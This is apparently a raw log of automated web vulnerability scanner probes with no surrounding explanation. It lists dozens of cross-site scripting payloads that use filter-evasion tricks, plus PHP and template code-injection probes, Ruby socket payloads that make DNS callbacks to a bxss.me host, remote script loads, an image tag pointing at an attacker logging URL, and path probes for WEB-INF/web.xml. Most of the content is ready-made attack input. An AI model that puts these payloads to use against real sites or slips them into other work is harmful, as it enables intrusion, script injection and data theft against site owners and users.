\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
ctime
sleep
p0
(I30
tp1
Rp2
.
<th:t="${dfb}#foreach
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(121).concat(76).concat(104).concat(71)+(require"socket"
Socket.gethostbyname("hitbu"+"lyzfafxdc70b7.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(97).concat(70).concat(107).concat(84)+(require'socket'
Socket.gethostbyname('hitkt'+'olwpiaaud4030.bxss.me.')[3].to_s)+'
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
find-out-about-our-products
find-out-about-our-products/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
dfb{{98991*97996}}xca
'"
<!--
'"()&%<zzz><ScRiPt >IwXH(9452)</ScRiPt>
dfb[[${98991*97996}]]xca
'"()&%<zzz><ScRiPt >IwXH(9548)</ScRiPt>
9754463
dfb__${98991*97996}__::.x
bfg5432<s1﹥s2ʺs3ʹhjl5432
bfgx7694%C0%BEz1%C0%BCz2a%90bcxhjl7694
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >p0Ti(9082)</ScRiPt>
<ScRiPt >IwXH(9470)</ScRiPt>
<WGGWHH>YWYSB[!+!]</WGGWHH>
<WD5PXD>N4YIN[!+!]</WD5PXD>
<script>IwXH(9515)</script>
<script>p0Ti(9618)</script>
<ScR<ScRiPt>IpT>IwXH(9325)</sCr<ScRiPt>IpT>
<ScR<ScRiPt>IpT>p0Ti(9172)</sCr<ScRiPt>IpT>
<ScRiPt
>IwXH(9838)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9134></ScRiPt>
<ScRiPt
>p0Ti(9804)</ScRiPt>
<isindex type=image src=1 onerror=IwXH(9207)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9888'>
<body onload=IwXH(9986)>
<img src=//xss.bxss.me/t/dot.gif onload=IwXH(9060)>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9123></ScRiPt>
<img src=xyz OnErRor=IwXH(9625)>
<img/src=">" onerror=alert(9382)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%49%77%58%48%289323%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\IwXH(9071)\u003C/sCripT\u003E
<isindex type=image src=1 onerror=p0Ti(9664)>
<ScRiPt>IwXH(9189)</sCripT>
%F6<img zzz onmouseover=IwXH(96271) //%F6>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9498'>
<input autofocus onfocus=IwXH(9727)>
<body onload=p0Ti(9067)>
<a HrEF=http://xss.bxss.me></a>
<img src=//xss.bxss.me/t/dot.gif onload=p0Ti(9444)>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(IwXH(9161))}
<img src=xyz OnErRor=p0Ti(9434)>
<img/src=">" onerror=alert(9250)>
y0KuW
<ScRiPt >IwXH(9467)</ScRiPt>
<WRFPNW>JXVZJ[!+!]</WRFPNW>
%0D%0A%3C%53%63%52%69%50%74%20%3E%70%30%54%69%289535%29%3C%2F%73%43%72%69%70%54%3E
<ifRAme sRc=9142.com></IfRamE>
<aUvFtir x=9736>
\u003CScRiPt\p0Ti(9565)\u003C/sCripT\u003E
<ScRiPt>p0Ti(9305)</sCripT>
<img sRc='http://attacker-9744/log.php?
<akzexvt<
%F6<img zzz onmouseover=p0Ti(95511) //%F6>
<input autofocus onfocus=p0Ti(9710)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(p0Ti(9576))}
tXR43
<ScRiPt >p0Ti(9391)</ScRiPt>
<WFPXQY>JDD52[!+!]</WFPXQY>
<ifRAme sRc=9222.com></IfRamE>
<a4lYf2G x=9163>
<img sRc='http://attacker-9724/log.php?
<a0Bk21U<